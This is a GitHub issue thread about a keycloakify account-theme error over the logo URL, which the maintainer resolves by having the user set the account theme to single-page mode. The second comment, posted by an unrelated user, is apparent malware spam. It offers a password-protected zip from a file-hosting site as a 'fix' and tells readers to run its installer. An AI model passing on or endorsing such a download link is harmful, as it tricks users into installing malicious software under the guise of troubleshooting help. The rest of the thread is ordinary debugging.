### ISSUE TITLE
ERROR: The logo url can't be an external url.

### ISSUE THREAD

**Issue by Arainay** [keycloakify/keycloak-account-ui#2]
Hello,

On the account page I get the error message "ERROR: The logo url can't be an external url." As far as I can see the reason is here - https://github.com/keycloakify/keycloak-account-ui/blob/69a2ccf426c838c9811a13c55834212c234becc0/src/KcAccountUiLoader.tsx#L106:L112

But my `kcContext` does not contain `resourceUrl`. The closest similar value is `kcContext.url.resourceUrl`.

![image](https://github.com/user-attachments/assets/73454ec9-52a6-4af7-8062-092190b42737)

My dependencies:
@keycloakify/keycloak-account-ui 25.0.2-rc.1
@keycloak/keycloak-admin-client 25.0.2
keycloak-js 25.0.2

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by garronej** [comment]
Hello @Arainay,  

If I remember correctly I think that the underlying Keycloak code does not allow fo the logo url to be fetched externally and this package is just a repackage of the official code, I can look into it but I'd like to avoid making codemod as much as possible.  

However, I don't understand the problem of having the logo bundled in the theme? 
It seems to me that it's the best solution.  

Can you show me the code that you wrote?  

Because maybe you wrote the following code, this won't work: 

```tsx
export default function KcPage(props: { kcContext: KcContext }) {
    const { kcContext } = props;

    return (
        <KcAccountUiLoader
            kcContext={kcContext}
            KcAccountUi={KcAccountUi}
            logoUrl="/my-logo.png"
        />
    );
}
```

Assuming you have `my-logo.png` in your `public` directory you have to write:  

```tsx
export default function KcPage(props: { kcContext: KcContext }) {
    const { kcContext } = props;

    return (
        <KcAccountUiLoader
            kcContext={kcContext}
            KcAccountUi={KcAccountUi}
            logoUrl={`${import.meta.env.BASE_URL}my-logo.png`}
        />
    );
}
```  

Otherwise you can implement the recomended approach of letting your bundler hande the import like:  

```tsx
import { lazy } from "react";
import { KcAccountUiLoader } from "@keycloakify/keycloak-account-ui";
import type { KcContext } from "./KcContext";
import myLogoPngUrl from "./assets/my-logo.png";

const KcAccountUi = lazy(() => import("@keycloakify/keycloak-account-ui/KcAccountUi"));

export default function KcPage(props: { kcContext: KcContext }) {
    const { kcContext } = props;

    return (
        <KcAccountUiLoader
            kcContext={kcContext}
            KcAccountUi={KcAccountUi}
            logoUrl={myLogoPngUrl}
        />
    );
}
```

**Comment by Arainay** [comment]
Hello @garronej ,

This is my KcPage component:
```tsx
import { KcAccountUiLoader } from '@keycloakify/keycloak-account-ui';
import { lazy } from 'react';
import logo from './assets/background.svg';
import type { KcContext } from './KcContext';

const KcAccountUi = lazy(() => import('./KcAccountUi'));

export default function KcPage(props: { kcContext: KcContext }) {
  const { kcContext } = props;

  return <KcAccountUiLoader kcContext={kcContext} KcAccountUi={KcAccountUi} logoUrl={`${logo}`} />;
}
```

and main.tsx:
```tsx
import { lazy, StrictMode } from 'react';
import { createRoot } from 'react-dom/client';
import { KcPage } from './keycloak-theme/kc.gen';

const KcLoginThemeApp = lazy(() => import('./keycloak-theme/login/KcPage'));
const KcAccountThemeApp = lazy(() => import('./keycloak-theme/account/KcPage'));

declare global {
  interface Window {
    kcContext?:
      | import('./keycloak-theme/login/KcContext').KcContext
      | import('./keycloak-theme/account/KcContext').KcContext;
  }
}

createRoot(document.getElementById('root')!).render(
  <StrictMode>
    {!window.kcContext ? <h1>No Keycloak Context</h1> : <KcPage kcContext={window.kcContext} />}
  </StrictMode>
);
```

I believe this is not a `logoUrl` related issue since there is a default value for `logoUrl` - https://github.com/keycloakify/keycloak-account-ui/blob/main/src/KcAccountUiLoader.tsx#L94C3-L104C8

I thought the problem was related to different versions (previously I was using keycloak v25.0.1), but at the moment all versions related to keycloak are 25.0.2. So I'm confused.

**Comment by garronej** [comment]
I think I understand the problem you're having.  

Your importing a SVG like:  

```tsx
import logo from './assets/background.svg';
```

and then you wrote this:  

```tsx
logoUrl={`${logo}`}
```

Instead of just:  

```tsx
logoUrl={logo}
```  

My guess is that you did that because you got a type error and this was a way to make it go away.  

But chances are your bundler (either vite or webpack) is configured in such a way that SVGs are imported as React components instead of string. So you're probably passing `"[object Object]"` as logoUrl.  

Try with:  

```tsx
import logo from './assets/background.svg?url';
```

> I thought the problem was related to different versions (previously I was using keycloak v25.0.1), but at the moment all versions related to keycloak are 25.0.2. So I'm confused.  

The version of this package that you are using does not need to match exactly the Keycloak version you are deploying on.  
This package will always be released with -rc.xxx version, I use the xxx for decoupling the version of this package to the version of the mirrored NPM package from the Keycloak team: https://www.npmjs.com/package/@keycloak/keycloak-account-ui/  

More info in the readme: https://github.com/keycloakify/keycloak-account-ui?tab=readme-ov-file#installation

**Comment by Arainay** [comment]
Unfortunately,
```
import logo from './assets/background.svg';
```
and
```
import logo from './assets/background.svg?url';
```
don't help

**Comment by garronej** [comment]
Can you `console.log(logo)` and show me what you're getting?

**Comment by Arainay** [comment]
Sure
![image](https://github.com/user-attachments/assets/c212e480-ea2a-4404-bfa1-3eb0f84af913)

**Comment by garronej** [comment]
Ah ok.  

You must set `accountThemeImplementation` to `"Single-Page"` in your vite config.  

It's supposed to be done automatically when you run the `npx keycloakify initialize-acount-theme`...

**Comment by Arainay** [comment]
Oh, I see. Thank you very much! Now it works

**Comment by garronej** [comment]
@Arainay can you give me some insights on how it happened?  

Did you run the `npx keycloakify initialize-account-theme` or did you set it up manually?  

If you did run the command, did you get any error message?  
Can you show me your vite config file (the part related to keycloakify?

**Comment by Arainay** [comment]
Sure. We are migrating to keycloak and a month ago we were using keycloak v23 with multi-page mode. So previously I ran the `npx keycloakify eject-page`. Also there are some custom scripts to run keycloak, and for keycloakify there is only `npx keycloakify build -p apps/sso-de-theme`

For now with single-page the keycloakify config is:
```
  keycloakify({
      themeName: 'sso-de',
      themeVersion: THEME_VERSION,
      keycloakifyBuildDirPath: '../../dist/apps/sso-de-theme',
      accountThemeImplementation: 'Single-Page',
      keycloakVersionTargets: {
        '21-and-below': false,
        '22-and-above': `sso-de-keycloak-theme-${THEME_VERSION}.jar`,
      },

      // This is a hook that will be called after the build is done
      // but before the jar is created.
      // You can use it to add/remove/edit your theme files.
      postBuild: async (keycloakifyBuildOptions) => {
        const fs = await import('fs/promises');
        const path = await import('path');

        await fs.writeFile(
          path.join(keycloakifyBuildOptions.keycloakifyBuildDirPath, 'foo.txt'),
          Buffer.from(
            [
              'This file was created by the postBuild hook of the keycloakify vite plugin',
              '',
              'Resolved keycloakifyBuildOptions:',
              '',
              JSON.stringify(keycloakifyBuildOptions, null, 2),
              '',
            ].join('\n'),
            'utf8'
          )
        );
      },
    }),
```

The command to build theme is the same - `npx keycloakify build -p apps/sso-de-theme`. Now there are no error messages when starting
